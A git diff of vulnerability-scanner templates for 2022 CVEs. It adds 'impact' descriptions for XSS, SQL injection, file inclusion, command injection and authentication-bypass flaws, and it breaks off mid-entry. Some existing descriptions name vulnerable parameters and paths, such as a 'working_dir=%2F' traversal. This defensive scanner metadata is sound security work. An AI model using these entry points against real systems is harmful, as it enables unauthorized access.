b/http/cves/2022/CVE-2022-39195.yaml index 4a3d0ba77c..5e93491295 100644 --- a/http/cves/2022/CVE-2022-39195.yaml +++ b/http/cves/2022/CVE-2022-39195.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | LISTSERV 17 web interface contains a cross-site scripting vulnerability. An attacker can inject arbitrary JavaScript or HTML via the "c" parameter, thereby possibly allowing the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-3933.yaml b/http/cves/2022/CVE-2022-3933.yaml index 4bbd474257..1ef06a8d15 100644 --- a/http/cves/2022/CVE-2022-3933.yaml +++ b/http/cves/2022/CVE-2022-3933.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Essential Real Estate plugin before 3.9.6 contains an authenticated cross-site scripting vulnerability. The plugin does not sanitize and escape some parameters, which can allow someone with a role as low as admin to inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow theft of cookie-based authentication credentials and launch of other attacks. + impact: | + An authenticated attacker can inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or further attacks. remediation: Fixed in version 3.9.6. reference: - https://wpscan.com/vulnerability/6395f3f1-5cdf-4c55-920c-accc0201baf4 diff --git a/http/cves/2022/CVE-2022-3934.yaml b/http/cves/2022/CVE-2022-3934.yaml index 754e34be11..c285711e84 100644 --- a/http/cves/2022/CVE-2022-3934.yaml +++ b/http/cves/2022/CVE-2022-3934.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress FlatPM plugin before 3.0.13 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape certain parameters before outputting them back in pages, which can be exploited against high privilege users such as admin. An attacker can steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 3.0.13. reference: - https://wpscan.com/vulnerability/ab68381f-c4b8-4945-a6a5-1d4d6473b73a diff --git a/http/cves/2022/CVE-2022-3980.yaml b/http/cves/2022/CVE-2022-3980.yaml index 4dc0caad57..1c0f3d9047 100644 --- a/http/cves/2022/CVE-2022-3980.yaml +++ b/http/cves/2022/CVE-2022-3980.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | An XML External Entity (XXE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises between versions 5.0.0 and 9.7.4. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server or conduct server-side request forgery (SSRF) attacks. remediation: | Apply the latest security patches or updates provided by Sophos to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-3982.yaml b/http/cves/2022/CVE-2022-3982.yaml index cce8226756..1c95f6abd7 100644 --- a/http/cves/2022/CVE-2022-3982.yaml +++ b/http/cves/2022/CVE-2022-3982.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Booking Calendar plugin before 3.2.2 is susceptible to arbitrary file upload possibly leading to remote code execution. The plugin does not validate uploaded files, which can allow an attacker to upload arbitrary files, such as PHP, and potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + This vulnerability can lead to remote code execution, allowing attackers to take control of the affected WordPress website. remediation: Fixed in 3.2.2. reference: - https://wpscan.com/vulnerability/4d91f3e1-4de9-46c1-b5ba-cc55b7726867 diff --git a/http/cves/2022/CVE-2022-39952.yaml b/http/cves/2022/CVE-2022-39952.yaml index f6c8a14ba9..487c81715a 100644 --- a/http/cves/2022/CVE-2022-39952.yaml +++ b/http/cves/2022/CVE-2022-39952.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Fortinet FortiNAC is susceptible to arbitrary file write. An external control of the file name or path can allow an attacker to execute unauthorized code or commands via specifically crafted HTTP request, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. Affected versions are 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, and 8.3.7. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data loss. remediation: Upgrade to 9.4.1, 9.2.6, 9.2.6, 9.1.8, 7.2.0 or above. reference: - https://fortiguard.com/psirt/FG-IR-22-300 diff --git a/http/cves/2022/CVE-2022-39960.yaml b/http/cves/2022/CVE-2022-39960.yaml index 409c36d598..6e8c0c5f44 100644 --- a/http/cves/2022/CVE-2022-39960.yaml +++ b/http/cves/2022/CVE-2022-39960.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Jira Netic Group Export add-on before 1.0.3 contains a missing authorization vulnerability. The add-on does not perform authorization checks, which can allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive data. remediation: | Upgrade to Jira Netic Group Export version 1.0.3 or later to fix the missing authorization issue. reference: diff --git a/http/cves/2022/CVE-2022-39986.yaml b/http/cves/2022/CVE-2022-39986.yaml index 3ebe24f624..bcf57356d0 100644 --- a/http/cves/2022/CVE-2022-39986.yaml +++ b/http/cves/2022/CVE-2022-39986.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A Command injection vulnerability in RaspAP 2.8.0 thru 2.8.7 allows unauthenticated attackers to execute arbitrary commands via the cfg_id parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php. + impact: | + Successful exploitation of this vulnerability can lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system. remediation: | Upgrade to a patched version of RaspAP or apply the vendor-supplied patch to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-40022.yaml b/http/cves/2022/CVE-2022-40022.yaml index c9c099289f..809a676103 100644 --- a/http/cves/2022/CVE-2022-40022.yaml +++ b/http/cves/2022/CVE-2022-40022.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Microchip Technology (Microsemi) SyncServer S650 was discovered to contain a command injection vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected device. remediation: | Apply the latest security patches or firmware updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-40083.yaml b/http/cves/2022/CVE-2022-40083.yaml index d945b3963f..69adb76b99 100644 --- a/http/cves/2022/CVE-2022-40083.yaml +++ b/http/cves/2022/CVE-2022-40083.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Labstack Echo 4.8.0 contains an open redirect vulnerability via the Static Handler component. An attacker can leverage this vulnerability to cause server-side request forgery, making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability could lead to phishing attacks, credential theft,. remediation: Download and install 4.9.0, which contains a patch for this issue. reference: - https://github.com/labstack/echo/issues/2259 diff --git a/http/cves/2022/CVE-2022-40127.yaml b/http/cves/2022/CVE-2022-40127.yaml index 97f498bfd1..31c9b6ee47 100644 --- a/http/cves/2022/CVE-2022-40127.yaml +++ b/http/cves/2022/CVE-2022-40127.yaml @@ -6,6 +6,8 @@ info: severity: high description: | A vulnerability in Example Dags of Apache Airflow allows an attacker with UI access who can trigger DAGs, to execute arbitrary commands via manually provided run_id parameter. This issue affects Apache Airflow Apache Airflow versions prior to 2.4.0. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade AirFlow to version 2.4.0 or later to mitigate this vulnerability. reference: 
diff --git a/http/cves/2022/CVE-2022-40359.yaml b/http/cves/2022/CVE-2022-40359.yaml index 58830e72af..0435d5d900 100644 --- a/http/cves/2022/CVE-2022-40359.yaml +++ b/http/cves/2022/CVE-2022-40359.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Kae's File Manager through 1.4.7 contains a cross-site scripting vulnerability via a crafted GET request to /kfm/index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of Kae's File Manager plugin (1.4.7) or apply the vendor-provided patch to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-4050.yaml b/http/cves/2022/CVE-2022-4050.yaml index 1b4353d0bf..a0506c8e99 100644 --- a/http/cves/2022/CVE-2022-4050.yaml +++ b/http/cves/2022/CVE-2022-4050.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress JoomSport plugin before 5.2.8 contains a SQL injection vulnerability. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + impact: | + An attacker can execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Update to JoomSport plugin version 5.2.8 or later. reference: diff --git a/http/cves/2022/CVE-2022-4057.yaml b/http/cves/2022/CVE-2022-4057.yaml index 9feb4a4144..8ea045676f 100644 --- a/http/cves/2022/CVE-2022-4057.yaml +++ b/http/cves/2022/CVE-2022-4057.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | The Autoptimize WordPress plugin before 3.1.0 uses an easily guessable path to store plugin's exported settings and logs. + impact: | + An attacker can gain access to sensitive information, potentially leading to further attacks. remediation: | Upgrade to Autoptimize version 3.1.0 or later to fix the information disclosure vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-4060.yaml b/http/cves/2022/CVE-2022-4060.yaml index 67fc26c094..921a51f363 100644 --- a/http/cves/2022/CVE-2022-4060.yaml +++ b/http/cves/2022/CVE-2022-4060.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress User Post Gallery plugin through 2.19 is susceptible to remote code execution. The plugin does not limit which callback functions can be called by users, making it possible for an attacker execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site. remediation: | Update to the latest version of the User Post Gallery plugin (>=2.20) to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-4063.yaml b/http/cves/2022/CVE-2022-4063.yaml index 340dc73865..619da4bb78 100644 --- a/http/cves/2022/CVE-2022-4063.yaml +++ b/http/cves/2022/CVE-2022-4063.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | WordPress InPost Gallery plugin before 2.1.4.1 is susceptible to local file inclusion. The plugin insecurely uses PHP's extract() function when rendering HTML views, which can allow attackers to force inclusion of malicious files and URLs. This, in turn, can enable them to execute code remotely on servers. + impact: | + The vulnerability allows an attacker to read arbitrary files on the server, potentially exposing sensitive information or executing malicious code. remediation: Fixed in version 2.1.4.1. reference: - https://wpscan.com/vulnerability/6bb07ec1-f1aa-4f4b-9717-c92f651a90a7 diff --git a/http/cves/2022/CVE-2022-40684.yaml b/http/cves/2022/CVE-2022-40684.yaml index 846fbd622c..a6a2d2d22d 100644 --- a/http/cves/2022/CVE-2022-40684.yaml +++ b/http/cves/2022/CVE-2022-40684.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Fortinet contains an authentication bypass vulnerability via using an alternate path or channel in FortiOS 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy 7.2.0 and 7.0.0 through 7.0.6, and FortiSwitchManager 7.2.0 and 7.0.0. An attacker can perform operations on the administrative interface via specially crafted HTTP or HTTPS requests, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the affected device. remediation: | Apply the necessary security patches or firmware updates provided by Fortinet to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-40734.yaml b/http/cves/2022/CVE-2022-40734.yaml index d8e3438636..47417c6c6d 100644 --- a/http/cves/2022/CVE-2022-40734.yaml +++ b/http/cves/2022/CVE-2022-40734.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Laravel Filemanager (aka UniSharp) through version 2.5.1 is vulnerable to local file inclusion via download?working_dir=%2F. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, sensitive data exposure, and remote code execution. remediation: | Upgrade to a patched version of Laravel Filemanager v2.5.1 or apply the recommended security patches provided by the vendor. reference: diff --git a/http/cves/2022/CVE-2022-40843.yaml b/http/cves/2022/CVE-2022-40843.yaml index 8fc98c285f..01409c925a 100644 --- a/http/cves/2022/CVE-2022-40843.yaml +++ b/http/cves/2022/CVE-2022-40843.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized configuration changes, network compromise, and potential access to sensitive information. remediation: | Apply the latest firmware update provided by the vendor to fix the authentication bypass vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-40879.yaml b/http/cves/2022/CVE-2022-40879.yaml index 39b66b0432..34020e6b2d 100644 --- a/http/cves/2022/CVE-2022-40879.yaml +++ b/http/cves/2022/CVE-2022-40879.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the errorMsg parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of kkFileView or apply the necessary security patches to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-40881.yaml b/http/cves/2022/CVE-2022-40881.yaml index c7a0696a35..014bcb46a4 100644 --- a/http/cves/2022/CVE-2022-40881.yaml +++ b/http/cves/2022/CVE-2022-40881.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | SolarView Compact 6.00 is vulnerable to a command injection via network_test.php. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system. remediation: | Apply the latest patch or upgrade to a non-vulnerable version of SolarView. reference: diff --git a/http/cves/2022/CVE-2022-4117.yaml b/http/cves/2022/CVE-2022-4117.yaml index 2d4056fe62..425f9d6917 100644 --- a/http/cves/2022/CVE-2022-4117.yaml +++ b/http/cves/2022/CVE-2022-4117.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | WordPress IWS Geo Form Fields plugin through 1.0 contains a SQL injection vulnerability. The plugin does not properly escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the affected WordPress site. remediation: | Update to the latest version of the WordPress IWS Geo Form Fields plugin (>=1.1) or apply the vendor-supplied patch to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-4140.yaml b/http/cves/2022/CVE-2022-4140.yaml index b103b553c6..f0a90f9cd7 100644 --- a/http/cves/2022/CVE-2022-4140.yaml +++ b/http/cves/2022/CVE-2022-4140.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Welcart e-Commerce plugin before 2.8.5 is susceptible to arbitrary file access. The plugin does not validate user input before using it to output the content of a file, which can allow an attacker to read arbitrary files on the server, obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can access sensitive files on the server, potentially exposing sensitive information. remediation: Fixed in version 2.8.5. reference: - https://wpscan.com/vulnerability/0d649a7e-3334-48f7-abca-fff0856e12c7 diff --git a/http/cves/2022/CVE-2022-41441.yaml b/http/cves/2022/CVE-2022-41441.yaml index 9a57bb4d17..466bb1db40 100644 --- a/http/cves/2022/CVE-2022-41441.yaml +++ b/http/cves/2022/CVE-2022-41441.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | ReQlogic v11.3 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the POBatch and WaitDuration parameters. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in ReQlogic v11.3. reference: diff --git a/http/cves/2022/CVE-2022-41473.yaml b/http/cves/2022/CVE-2022-41473.yaml index 5bd8161046..a0e02c99be 100644 --- a/http/cves/2022/CVE-2022-41473.yaml +++ b/http/cves/2022/CVE-2022-41473.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | RPCMS 3.0.2 contains a cross-site scripting vulnerability in the Search function. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the website. remediation: | Apply the latest security patch or upgrade to a newer version of RPCMS to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-41840.yaml b/http/cves/2022/CVE-2022-41840.yaml index 3084754ade..8d787601f8 100644 --- a/http/cves/2022/CVE-2022-41840.yaml +++ b/http/cves/2022/CVE-2022-41840.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Welcart eCommerce 2.7.7 and before are vulnerable to unauthenticated local file inclusion. + impact: | + The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation. remediation: | Upgrade Welcart eCommerce plugin to the latest version (>=2.7.8) or apply the provided patch to fix the LFI vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-42094.yaml b/http/cves/2022/CVE-2022-42094.yaml index 977282b0a7..1a8d2ebc55 100644 --- a/http/cves/2022/CVE-2022-42094.yaml +++ b/http/cves/2022/CVE-2022-42094.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the 'Card' content. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of Backdrop CMS or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2022/CVE-2022-42095.yaml b/http/cves/2022/CVE-2022-42095.yaml index ae0a23d0f8..e075b8de4f 100644 --- a/http/cves/2022/CVE-2022-42095.yaml +++ b/http/cves/2022/CVE-2022-42095.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Page content. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to a patched version of Backdrop CMS or apply the necessary security patches provided by the vendor. reference: 
diff --git a/http/cves/2022/CVE-2022-4260.yaml b/http/cves/2022/CVE-2022-4260.yaml index bb2a142929..afc3a603af 100644 --- a/http/cves/2022/CVE-2022-4260.yaml +++ b/http/cves/2022/CVE-2022-4260.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress WP-Ban plugin before 1.69.1 contains a stored cross-site scripting vulnerability. The plugin does not sanitize and escape some of its settings, which can allow high-privilege users to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be exploited even when the unfiltered_html capability is disallowed, for example in multisite setup. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or further compromise of the affected system. remediation: Fixed in version 1.69.1 reference: - https://wpscan.com/vulnerability/d0cf24be-df87-4e1f-aae7-e9684c88e7db diff --git a/http/cves/2022/CVE-2022-42746.yaml b/http/cves/2022/CVE-2022-42746.yaml index bcd5c1b983..d034635d87 100644 --- a/http/cves/2022/CVE-2022-42746.yaml +++ b/http/cves/2022/CVE-2022-42746.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | CandidATS 3.0.0 contains a cross-site scripting vulnerability via the indexFile parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | To mitigate this vulnerability, it is recommended to apply the latest security patch or upgrade to a non-vulnerable version of CandidATS. reference: 
diff --git a/http/cves/2022/CVE-2022-42747.yaml b/http/cves/2022/CVE-2022-42747.yaml index e4fc5d20aa..3a6438833e 100644 --- a/http/cves/2022/CVE-2022-42747.yaml +++ b/http/cves/2022/CVE-2022-42747.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | CandidATS 3.0.0 contains a cross-site scripting vulnerability via the sortBy parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the application. remediation: | To mitigate this vulnerability, it is recommended to apply the latest security patch or upgrade to a non-vulnerable version of CandidATS. reference: diff --git a/http/cves/2022/CVE-2022-42748.yaml b/http/cves/2022/CVE-2022-42748.yaml index f769c8aff8..fca9dedf7e 100644 --- a/http/cves/2022/CVE-2022-42748.yaml +++ b/http/cves/2022/CVE-2022-42748.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | CandidATS 3.0.0 contains a cross-site scripting vulnerability via the sortDirection parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor. reference: 
diff --git a/http/cves/2022/CVE-2022-42749.yaml b/http/cves/2022/CVE-2022-42749.yaml index 8de7d1a687..2e61c546a0 100644 --- a/http/cves/2022/CVE-2022-42749.yaml +++ b/http/cves/2022/CVE-2022-42749.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | CandidATS 3.0.0 contains a cross-site scripting vulnerability via the page parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement. remediation: | To mitigate this vulnerability, it is recommended to apply the latest security patch or upgrade to a non-vulnerable version of CandidATS. reference: diff --git a/http/cves/2022/CVE-2022-4295.yaml b/http/cves/2022/CVE-2022-4295.yaml index fc441ddb6d..6b078e11ea 100644 --- a/http/cves/2022/CVE-2022-4295.yaml +++ b/http/cves/2022/CVE-2022-4295.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The Show All Comments WordPress plugin before 7.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the Show all comments plugin (7.0.1) or apply the vendor-supplied patch to fix the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-4301.yaml b/http/cves/2022/CVE-2022-4301.yaml index e979aab6b4..773e5ae7c8 100644 
--- a/http/cves/2022/CVE-2022-4301.yaml +++ b/http/cves/2022/CVE-2022-4301.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Sunshine Photo Cart plugin before 2.9.15 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 2.9.15. reference: - https://wpscan.com/vulnerability/a8dca528-fb70-44f3-8149-21385039179d diff --git a/http/cves/2022/CVE-2022-43014.yaml b/http/cves/2022/CVE-2022-43014.yaml index 1325a23249..559d1bc25a 100644 --- a/http/cves/2022/CVE-2022-43014.yaml +++ b/http/cves/2022/CVE-2022-43014.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the joborderID parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of OpenCATS or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2022/CVE-2022-43015.yaml b/http/cves/2022/CVE-2022-43015.yaml index 9e7389a23a..ba194ba2ca 100644 --- a/http/cves/2022/CVE-2022-43015.yaml 
+++ b/http/cves/2022/CVE-2022-43015.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the entriesPerPage parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses this issue. reference: diff --git a/http/cves/2022/CVE-2022-43016.yaml b/http/cves/2022/CVE-2022-43016.yaml index 7ac0949403..7adff34ad6 100644 --- a/http/cves/2022/CVE-2022-43016.yaml +++ b/http/cves/2022/CVE-2022-43016.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the callback component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-43017.yaml b/http/cves/2022/CVE-2022-43017.yaml index 2a05e42ef9..06065ab7a2 100644 
--- a/http/cves/2022/CVE-2022-43017.yaml +++ b/http/cves/2022/CVE-2022-43017.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the indexFile component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses this issue. reference: diff --git a/http/cves/2022/CVE-2022-4306.yaml b/http/cves/2022/CVE-2022-4306.yaml index 63125280bf..bc8c2f658c 100644 --- a/http/cves/2022/CVE-2022-4306.yaml +++ b/http/cves/2022/CVE-2022-4306.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Panda Pods Repeater Field before 1.5.4 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. This can be leveraged against a user who has at least Contributor permission. An attacker can also steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: Fixed in version 1.5.4. reference: - https://wpscan.com/vulnerability/18d7f9af-7267-4723-9d6f-05b895c94dbe diff --git a/http/cves/2022/CVE-2022-43140.yaml b/http/cves/2022/CVE-2022-43140.yaml index 1ab6cc60e2..d8c8a0f4ed 100644 --- a/http/cves/2022/CVE-2022-43140.yaml 
+++ b/http/cves/2022/CVE-2022-43140.yaml @@ -6,6 +6,8 @@ info: severity: high description: | kkFileView 4.1.0 is susceptible to server-side request forgery via the component cn.keking.web.controller.OnlinePreviewController#getCorsFile. An attacker can force the application to make arbitrary requests via injection of crafted URLs into the url parameter and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to internal resources, potential data leakage, and further attacks on the server. remediation: | Apply the latest security patches or updates provided by the vendor to fix the SSRF vulnerability in kkFileView 4.1.0. reference: diff --git a/http/cves/2022/CVE-2022-43164.yaml b/http/cves/2022/CVE-2022-43164.yaml index 2f2a5a2deb..6bd8f4b7a8 100644 --- a/http/cves/2022/CVE-2022-43164.yaml +++ b/http/cves/2022/CVE-2022-43164.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross-site scripting (XSS) vulnerability in the Global Lists feature (/index.php?module=global_lists/lists) of 